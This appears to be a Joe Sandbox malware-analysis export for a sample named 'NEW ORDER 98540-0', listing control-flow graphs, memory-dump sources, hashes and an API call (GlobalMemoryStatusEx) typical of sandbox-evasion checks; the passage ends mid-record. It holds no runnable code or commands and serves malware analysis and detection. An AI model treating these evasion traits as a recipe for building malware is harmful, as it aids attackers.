                                              control_flow_graph 456 30d4804-30d480e 457 30d4815-30d489c 456->457 458 30d4810-30d4814 456->458 461 30d489e-30d48a9 457->461 462 30d48e6-30d48e8 457->462 458->457 461->462 463 30d48ab-30d48b7 461->463 464 30d48ea-30d4902 462->464 465 30d48b9-30d48c3 463->465 466 30d48da-30d48e4 463->466 471 30d494c-30d494e 464->471 472 30d4904-30d490f 464->472 467 30d48c5 465->467 468 30d48c7-30d48d6 465->468 466->464 467->468 468->468 470 30d48d8 468->470 470->466 474 30d4950-30d4962 471->474 472->471 473 30d4911-30d491d 472->473 475 30d491f-30d4929 473->475 476 30d4940-30d494a 473->476 481 30d4969-30d4995 474->481 477 30d492d-30d493c 475->477 478 30d492b 475->478 476->474 477->477 480 30d493e 477->480 478->477 480->476 482 30d499b-30d49a9 481->482 483 30d49ab-30d49b1 482->483 484 30d49b2-30d49c0 482->484 483->484 487 30d49c8-30d49d2 484->487 488 30d49dc-30d4a0f 487->488 491 30d4a1f-30d4a23 488->491 492 30d4a11-30d4a15 488->492 494 30d4a25-30d4a29 491->494 495 30d4a33-30d4a37 491->495 492->491 493 30d4a17-30d4a1a call 30d0ab8 492->493 493->491 494->495 496 30d4a2b-30d4a2e call 30d0ab8 494->496 497 30d4a39-30d4a3d 495->497 498 30d4a47-30d4a4b 495->498 496->495 497->498 501 30d4a3f 497->501 502 30d4a4d-30d4a51 498->502 503 30d4a5b 498->503 501->498 502->503 504 30d4a53 502->504 505 30d4a5c 503->505 504->503 505->505
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Vm$\Vm
                                              • API String ID: 0-4290693290
                                              • Opcode ID: dbc5f7991a595ad0c9733d61cfecfc874a46a4d4dba808c6d3cddd6ce0375c94
                                              • Instruction ID: 89b4d71a088437327ea25f4760b7b02e93077a9e02917e7cc054dd4b987e026e
                                              • Opcode Fuzzy Hash: dbc5f7991a595ad0c9733d61cfecfc874a46a4d4dba808c6d3cddd6ce0375c94
                                              • Instruction Fuzzy Hash: 17719970E01349DFDF10CFAAC98579EFBF2AF88714F188129E419AB254EB749841CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 506 30d4810-30d489c 510 30d489e-30d48a9 506->510 511 30d48e6-30d48e8 506->511 510->511 512 30d48ab-30d48b7 510->512 513 30d48ea-30d4902 511->513 514 30d48b9-30d48c3 512->514 515 30d48da-30d48e4 512->515 520 30d494c-30d494e 513->520 521 30d4904-30d490f 513->521 516 30d48c5 514->516 517 30d48c7-30d48d6 514->517 515->513 516->517 517->517 519 30d48d8 517->519 519->515 523 30d4950-30d49a9 520->523 521->520 522 30d4911-30d491d 521->522 524 30d491f-30d4929 522->524 525 30d4940-30d494a 522->525 532 30d49ab-30d49b1 523->532 533 30d49b2-30d49d2 523->533 526 30d492d-30d493c 524->526 527 30d492b 524->527 525->523 526->526 529 30d493e 526->529 527->526 529->525 532->533 537 30d49dc-30d4a0f 533->537 540 30d4a1f-30d4a23 537->540 541 30d4a11-30d4a15 537->541 543 30d4a25-30d4a29 540->543 544 30d4a33-30d4a37 540->544 541->540 542 30d4a17-30d4a1a call 30d0ab8 541->542 542->540 543->544 545 30d4a2b-30d4a2e call 30d0ab8 543->545 546 30d4a39-30d4a3d 544->546 547 30d4a47-30d4a4b 544->547 545->544 546->547 550 30d4a3f 546->550 551 30d4a4d-30d4a51 547->551 552 30d4a5b 547->552 550->547 551->552 553 30d4a53 551->553 554 30d4a5c 552->554 553->552 554->554
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Vm$\Vm
                                              • API String ID: 0-4290693290
                                              • Opcode ID: b5f7d51203a442219629db74c7e607372b4d82252940eaf4992be3efe9cd5bcb
                                              • Instruction ID: bd1b01e7a075c6ae16031e00c2f08b4a9d3c005c1220bf4980928d81699064d2
                                              • Opcode Fuzzy Hash: b5f7d51203a442219629db74c7e607372b4d82252940eaf4992be3efe9cd5bcb
                                              • Instruction Fuzzy Hash: A6717A70E01349CFDF50CFAAC98579EFBF2AF88714F188129E419AB254EB749841CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1177 67ce270-67ce272 1178 67ce27a-67ce2b6 1177->1178 1179 67ce274-67ce275 1177->1179 1180 67ce2be-67ce2ec GlobalMemoryStatusEx 1178->1180 1179->1178 1181 67ce2ee-67ce2f4 1180->1181 1182 67ce2f5-67ce31d 1180->1182 1181->1182
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE ref: 067CE2DF
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3346016199.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_67c0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: f94724b29e403125453a14bb091596e01ba57046b2e7c205c236aaa33df8a090
                                              • Instruction ID: 0395bf3d8136f6b9aa17526390615d751a037cb0081e88af10e71cdce4d5e63d
                                              • Opcode Fuzzy Hash: f94724b29e403125453a14bb091596e01ba57046b2e7c205c236aaa33df8a090
                                              • Instruction Fuzzy Hash: E41103B1C0066A9FDB10CF9AC5447EEFBF4AF48720F14816AD918A7240D778A954CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1185 67ce278-67ce2ec GlobalMemoryStatusEx 1187 67ce2ee-67ce2f4 1185->1187 1188 67ce2f5-67ce31d 1185->1188 1187->1188
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE ref: 067CE2DF
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3346016199.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_67c0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: e136e6ca7e84470fda226faad973b5ef7ef1a8932a2b5bbbc1566a709a776e6f
                                              • Instruction ID: fd13b59599b439a2d261e94e53c03d7d366c870add36b6698db83ebeaee2200d
                                              • Opcode Fuzzy Hash: e136e6ca7e84470fda226faad973b5ef7ef1a8932a2b5bbbc1566a709a776e6f
                                              • Instruction Fuzzy Hash: 321114B1C0065A9BCB10CF9AC54479EFBF4AF48320F14816AD918B7240D778A954CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1258 30d3e74-30d3e7a 1259 30d3e7c-30d3e7d 1258->1259 1260 30d3e81-30d3ee6 1258->1260 1259->1260 1262 30d3ee8-30d3ef3 1260->1262 1263 30d3f30-30d3f32 1260->1263 1262->1263 1264 30d3ef5-30d3f01 1262->1264 1265 30d3f34-30d3f8c 1263->1265 1266 30d3f24-30d3f2e 1264->1266 1267 30d3f03-30d3f0d 1264->1267 1274 30d3f8e-30d3f99 1265->1274 1275 30d3fd6-30d3fd8 1265->1275 1266->1265 1268 30d3f0f 1267->1268 1269 30d3f11-30d3f20 1267->1269 1268->1269 1269->1269 1271 30d3f22 1269->1271 1271->1266 1274->1275 1276 30d3f9b-30d3fa7 1274->1276 1277 30d3fda-30d3ff2 1275->1277 1278 30d3fa9-30d3fb3 1276->1278 1279 30d3fca-30d3fd4 1276->1279 1284 30d403c-30d403e 1277->1284 1285 30d3ff4-30d3fff 1277->1285 1280 30d3fb5 1278->1280 1281 30d3fb7-30d3fc6 1278->1281 1279->1277 1280->1281 1281->1281 1283 30d3fc8 1281->1283 1283->1279 1286 30d4040-30d4052 1284->1286 1285->1284 1287 30d4001-30d400d 1285->1287 1294 30d4059-30d408e 1286->1294 1288 30d400f-30d4019 1287->1288 1289 30d4030-30d403a 1287->1289 1290 30d401d-30d402c 1288->1290 1291 30d401b 1288->1291 1289->1286 1290->1290 1293 30d402e 1290->1293 1291->1290 1293->1289 1295 30d4094-30d40a2 1294->1295 1296 30d40ab-30d40b9 1295->1296 1297 30d40a4-30d40aa 1295->1297 1300 30d40c1-30d40cb 1296->1300 1297->1296 1301 30d40d5-30d410b 1300->1301 1304 30d410d-30d4111 1301->1304 1305 30d411b-30d411f 1301->1305 1304->1305 1306 30d4113 1304->1306 1307 30d412f-30d4133 1305->1307 1308 30d4121-30d4125 1305->1308 1306->1305 1310 30d4135-30d4139 1307->1310 1311 30d4143-30d4147 1307->1311 1308->1307 1309 30d4127-30d412a call 30d0ab8 1308->1309 1309->1307 1310->1311 1315 30d413b-30d413e call 30d0ab8 1310->1315 1312 30d4149-30d414d 1311->1312 1313 30d4157-30d415b 1311->1313 1312->1313 1316 30d414f-30d4152 call 30d0ab8 1312->1316 1317 30d415d-30d4161 1313->1317 1318 30d416b-30d416f 1313->1318 1315->1311 1316->1313 1317->1318 1321 30d4163 1317->1321 1322 30d417f 1318->1322 1323 30d4171-30d4175 1318->1323 1321->1318 1325 30d4180 1322->1325 1323->1322 1324 30d4177 1323->1324 1324->1322 1325->1325
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Vm
                                              • API String ID: 0-711957416
                                              • Opcode ID: 0f5f62964ee4d1784ae184e62061205730946ad2ff64b467643f6fd11a76cd1f
                                              • Instruction ID: 923dbab06f650075bfab329743a343eafdf4a2cae1c3555d0ba5ea66c1e50d97
                                              • Opcode Fuzzy Hash: 0f5f62964ee4d1784ae184e62061205730946ad2ff64b467643f6fd11a76cd1f
                                              • Instruction Fuzzy Hash: 75A15A74E01349CFDF50CFAAD9857DEBBF2AF88314F188129E415AB254EB749845CB82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2866 30d790b-30d7916 2867 30d791d-30d791f 2866->2867 2868 30d7918-30d791c 2866->2868 2869 30d7921-30d7924 2867->2869 2868->2867 2870 30d7926-30d794c 2869->2870 2871 30d7951-30d7954 2869->2871 2870->2871 2872 30d7956-30d797c 2871->2872 2873 30d7981-30d7984 2871->2873 2872->2873 2874 30d7986-30d79ac 2873->2874 2875 30d79b1-30d79b4 2873->2875 2874->2875 2877 30d79b6-30d79dc 2875->2877 2878 30d79e1-30d79e4 2875->2878 2877->2878 2880 30d79e6-30d7a0c 2878->2880 2881 30d7a11-30d7a14 2878->2881 2880->2881 2885 30d7a16-30d7a3c 2881->2885 2886 30d7a41-30d7a44 2881->2886 2885->2886 2888 30d7a46-30d7a6c 2886->2888 2889 30d7a71-30d7a74 2886->2889 2888->2889 2895 30d7a76-30d7a9c 2889->2895 2896 30d7aa1-30d7aa4 2889->2896 2895->2896 2898 30d7aa6-30d7acc 2896->2898 2899 30d7ad1-30d7ad4 2896->2899 2898->2899 2905 30d7ad6-30d7afc 2899->2905 2906 30d7b01-30d7b04 2899->2906 2905->2906 2908 30d7b06-30d7b2c 2906->2908 2909 30d7b31-30d7b34 2906->2909 2908->2909 2915 30d7b36-30d7b5c 2909->2915 2916 30d7b61-30d7b64 2909->2916 2915->2916 2918 30d7b66-30d7b8c 2916->2918 2919 30d7b91-30d7b94 2916->2919 2918->2919 2925 30d7b96-30d7bbc 2919->2925 2926 30d7bc1-30d7bc4 2919->2926 2925->2926 2928 30d7bc6-30d7bec 2926->2928 2929 30d7bf1-30d7bf4 2926->2929 2928->2929 2935 30d7bf6-30d7c1c 2929->2935 2936 30d7c21-30d7c24 2929->2936 2935->2936 2938 30d7c26-30d7c4c 2936->2938 2939 30d7c51-30d7c54 2936->2939 2938->2939 2945 30d7c56-30d7c7c 2939->2945 2946 30d7c81-30d7c84 2939->2946 2945->2946 2948 30d7c86-30d7cac 2946->2948 2949 30d7cb1-30d7cb4 2946->2949 2948->2949 2955 30d7cb6-30d7cdc 2949->2955 2956 30d7ce1-30d7ce4 2949->2956 2955->2956 2958 30d7ce6-30d7d0c 2956->2958 2959 30d7d11-30d7d14 2956->2959 2958->2959 2965 30d7d16-30d7d3c 2959->2965 2966 30d7d41-30d7d44 2959->2966 2965->2966 2968 30d7d46-30d7d6c 2966->2968 2969 30d7d71-30d7d74 2966->2969 2968->2969 2975 30d7d76-30d7d9c 2969->2975 2976 30d7da1-30d7da4 2969->2976 2975->2976 2978 30d7dbf-30d7dc2 2976->2978 2979 30d7da6-30d7dba 2976->2979 2985 30d7def-30d7df2 2978->2985 2986 30d7dc4-30d7dea 2978->2986 2979->2978 2988 30d7df4-30d7df6 2985->2988 2989 30d7e03-30d7e06 2985->2989 2986->2985 3082 30d7df8 call 30d9150 2988->3082 3083 30d7df8 call 30d9160 2988->3083 3084 30d7df8 call 30d9203 2988->3084 2995 30d7e08-30d7e2e 2989->2995 2996 30d7e33-30d7e36 2989->2996 2995->2996 3001 30d7e38-30d7e5e 2996->3001 3002 30d7e63-30d7e66 2996->3002 2998 30d7dfe 2998->2989 3001->3002 3004 30d7e68-30d7e8e 3002->3004 3005 30d7e93-30d7e96 3002->3005 3004->3005 3009 30d7e98-30d7ebe 3005->3009 3010 30d7ec3-30d7ec6 3005->3010 3009->3010 3012 30d7ec8-30d7eee 3010->3012 3013 30d7ef3-30d7ef6 3010->3013 3012->3013 3018 30d7ef8 3013->3018 3019 30d7f03-30d7f06 3013->3019 3025 30d7efe 3018->3025 3020 30d7f08-30d7f1e 3019->3020 3021 30d7f23-30d7f26 3019->3021 3020->3021 3028 30d7f28-30d7f4e 3021->3028 3029 30d7f53-30d7f56 3021->3029 3025->3019 3028->3029 3030 30d7f58-30d7f7e 3029->3030 3031 30d7f83-30d7f86 3029->3031 3030->3031 3036 30d7f88-30d7fae 3031->3036 3037 30d7fb3-30d7fb6 3031->3037 3036->3037 3039 30d7fb8-30d7fde 3037->3039 3040 30d7fe3-30d7fe6 3037->3040 3039->3040 3044 30d7fe8-30d800e 3040->3044 3045 30d8013-30d8016 3040->3045 3044->3045 3048 30d8018-30d803e 3045->3048 3049 30d8043-30d8046 3045->3049 3048->3049 3052 30d8048-30d806e 3049->3052 3053 30d8073-30d8076 3049->3053 3052->3053 3057 30d8078-30d809e 3053->3057 3058 30d80a3-30d80a6 3053->3058 3057->3058 3062 30d80a8-30d80ce 3058->3062 3063 30d80d3-30d80d5 3058->3063 3062->3063 3067 30d80dc-30d80df 3063->3067 3068 30d80d7 3063->3068 3067->2869 3072 30d80e5-30d80eb 3067->3072 3068->3067 3082->2998 3083->2998 3084->2998
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8c7aa0a3eec862b23bcaab54ca4037056cb9e8eccb39028ff606f0694b8a4d71
                                              • Instruction ID: 0734eac20ca88b7f504ae7b9f5c5bd309e82934e51a71647f1c3fdb5e82eb468
                                              • Opcode Fuzzy Hash: 8c7aa0a3eec862b23bcaab54ca4037056cb9e8eccb39028ff606f0694b8a4d71
                                              • Instruction Fuzzy Hash: 96129130701207CBDB5A9B38F98522C3AE6FBC9710B64897DE505CB360CE7ADC869785
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ef9403169e4984a1e6fc02011802b435d5bf6a051743c9bc401d8ab51eb5f470
                                              • Instruction ID: 2a1628178a33541f5a7e3a0f32024fe43e4ec578af83ea13e31b725559568e36
                                              • Opcode Fuzzy Hash: ef9403169e4984a1e6fc02011802b435d5bf6a051743c9bc401d8ab51eb5f470
                                              • Instruction Fuzzy Hash: 18D1AD71A012058FDB54DF68D8807AEBBF5FF88310F2485AAE909EB395DB74D845CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: edcd1f00134c2039a10b7113328bf7766851ed02a129f0c393dd3624c5c5821e
                                              • Instruction ID: 5f8042b0a7825435ad701c8fbfd931124f6eddcf0485b0049cdfe9a05fb5a299
                                              • Opcode Fuzzy Hash: edcd1f00134c2039a10b7113328bf7766851ed02a129f0c393dd3624c5c5821e
                                              • Instruction Fuzzy Hash: 07A15C70E013498FDB50CFAAC98579DFBF1AF88714F188529D818EB254EB749845CF81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0dd902c298ee7d1cc2969ee091629acdeb1b3bef43d596a901afd1058420056f
                                              • Instruction ID: d4c9c99df1ffb85719332cb0e11a064b7078d7eb82e99e6199b381abd9edca0e
                                              • Opcode Fuzzy Hash: 0dd902c298ee7d1cc2969ee091629acdeb1b3bef43d596a901afd1058420056f
                                              • Instruction Fuzzy Hash: BBA15A34A01205DFDB55DB68E594AADBBF6FF88310F248568E806EB364DB34EC42CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 956e95c9fc693785f326dbf7e5066cc26348b28058c39a2ae2468537470392b8
                                              • Instruction ID: 6eac286d5490f1bbad5a4afcc6bcef60285443763b3e3cf1c9fa003b507603a7
                                              • Opcode Fuzzy Hash: 956e95c9fc693785f326dbf7e5066cc26348b28058c39a2ae2468537470392b8
                                              • Instruction Fuzzy Hash: 2451CE30A0234A9FDB14DF64D45479EBBF6FF85310F64846AE406EB290DB72A8468B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e650331ef0e235eb043d53f4643239456b9cfce837a13c0bee7abfbaf5bb54c
                                              • Instruction ID: 16d9a3be3b77fe4fcba9ca2acc14aed4d77da8167dae96c2562063ea3193c36b
                                              • Opcode Fuzzy Hash: 2e650331ef0e235eb043d53f4643239456b9cfce837a13c0bee7abfbaf5bb54c
                                              • Instruction Fuzzy Hash: E1510F70E013588FDB18CFA9D888B9DFBF1BF48310F58852AE819BB255D775A844CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 982fe171c8958862251fffc85e7043fb15961cdd5303aa6a8f218df1c1930630
                                              • Instruction ID: ce5ac36116dbfe79fa392a7f7826850fc5696f934e632214eaf3eca2f1361890
                                              • Opcode Fuzzy Hash: 982fe171c8958862251fffc85e7043fb15961cdd5303aa6a8f218df1c1930630
                                              • Instruction Fuzzy Hash: 9651F070D013188FDB14CFA9D884B9EBBF1AF48310F58851AE815BB255DB75A844CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b0dff79231f435e173e012b13669f8db1245bdf8a09964f25d05a876bc0d4e14
                                              • Instruction ID: fb6c25773197e1f253f1281626ec064aac57001d961682327e8a70c848685531
                                              • Opcode Fuzzy Hash: b0dff79231f435e173e012b13669f8db1245bdf8a09964f25d05a876bc0d4e14
                                              • Instruction Fuzzy Hash: 4241E234B023419FEB98DB24E5047AEBBF5EF89200F1805A9D506DB251DF3A9C41CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ce34f4369d785688b8c383e5c937b5647ed4c75ee15c4b23f59536445f435f84
                                              • Instruction ID: 225965e616974e739d293d3fafd24821f33eb54d9e3ecf5b913382f76ae5a6e1
                                              • Opcode Fuzzy Hash: ce34f4369d785688b8c383e5c937b5647ed4c75ee15c4b23f59536445f435f84
                                              • Instruction Fuzzy Hash: 9D512EB0206146CFC719DB2AF980A483FA1EBD630530161ADD5206B27ADB792D8BCB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c7851766441031829e16cb4e3917358922032fd851a648bec147391050eb6687
                                              • Instruction ID: 60a32b8cfd93498f91ed5190d6b39e54effe9566b6a55f0d33b35dbc7c8a8157
                                              • Opcode Fuzzy Hash: c7851766441031829e16cb4e3917358922032fd851a648bec147391050eb6687
                                              • Instruction Fuzzy Hash: EB41FD317013068FCB59EB38D95466E7BFAABC9244FA88868D406DB385EE35CC46C7D1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d5f4919d28aeceeaf7478495ea7afa41be4c973c940fc6d29cbd6eb7bda94dd3
                                              • Instruction ID: 893fd7274d74de221e70170642a78d94b20d77555393a77ac97b1fe64a0c0706
                                              • Opcode Fuzzy Hash: d5f4919d28aeceeaf7478495ea7afa41be4c973c940fc6d29cbd6eb7bda94dd3
                                              • Instruction Fuzzy Hash: 52419F38602305CFDB58EB78D9546AD7BF6EF8E244F1504A8D806EB3A0DB769C41CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6058738ba88cf8fbaf6063c7a659b9685316248684647f515c1293fbd3bc6b98
                                              • Instruction ID: 1f9b8be0722ffb8d5aa5cba766d62cb4955c8039092a95adb1bfb0bc76eb251e
                                              • Opcode Fuzzy Hash: 6058738ba88cf8fbaf6063c7a659b9685316248684647f515c1293fbd3bc6b98
                                              • Instruction Fuzzy Hash: D851DCB0206147CFC719DF2AFA809483FA1FBD530530661ADD5206B27ADB796D8ADF41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5f07408ac18714a276b5c6c036578c3841caee2d42116bde1a028bc7da212e08
                                              • Instruction ID: ee8c895ae1a02f2e05302af13dd48109028eb9afdb1f33b035dea4e667a5c56e
                                              • Opcode Fuzzy Hash: 5f07408ac18714a276b5c6c036578c3841caee2d42116bde1a028bc7da212e08
                                              • Instruction Fuzzy Hash: 66313834E0031A9BCB19CF65D89469EB7F6BF89300F148529E906EB750EB70AC42CB44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 75e382c7fd234167d03bdef9d39ba6248b3813d3fce00ea121ad76acf5134571
                                              • Instruction ID: a004fc27d3de0c4ec079addeb9aa73171435910ebf9773460ffc38e5bfaadbef
                                              • Opcode Fuzzy Hash: 75e382c7fd234167d03bdef9d39ba6248b3813d3fce00ea121ad76acf5134571
                                              • Instruction Fuzzy Hash: 98315C30E1121ADBDB14CFA8D45479EBBF6FF85710F648565E806EB280DB71E8468B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 929b14370404b3481f4f53c040d6f00f69a0ca2daa26e5e21ef9bbc1c1c4fc53
                                              • Instruction ID: 03da1d8668ddb464bf7488cf0b59db813bcbf2a3e4c76c5a75c199cd31ccff62
                                              • Opcode Fuzzy Hash: 929b14370404b3481f4f53c040d6f00f69a0ca2daa26e5e21ef9bbc1c1c4fc53
                                              • Instruction Fuzzy Hash: F141FDB0901349DFDB10DFA9C984A9EBBF9EF48310F248429E809AB254DB75A945CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dabd784dd551a059eecbb9dacf4ff35843659f24a4f6d1971f1c71d0faa66976
                                              • Instruction ID: 6969cd7324010f76cb9489583b0ee933e36feaa484e6ea516fbb1de9e9eaecaa
                                              • Opcode Fuzzy Hash: dabd784dd551a059eecbb9dacf4ff35843659f24a4f6d1971f1c71d0faa66976
                                              • Instruction Fuzzy Hash: AB313934E0030A9BCB19CF69D89469EB7F6BF89300F14C529E916EB750DB70AC42CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
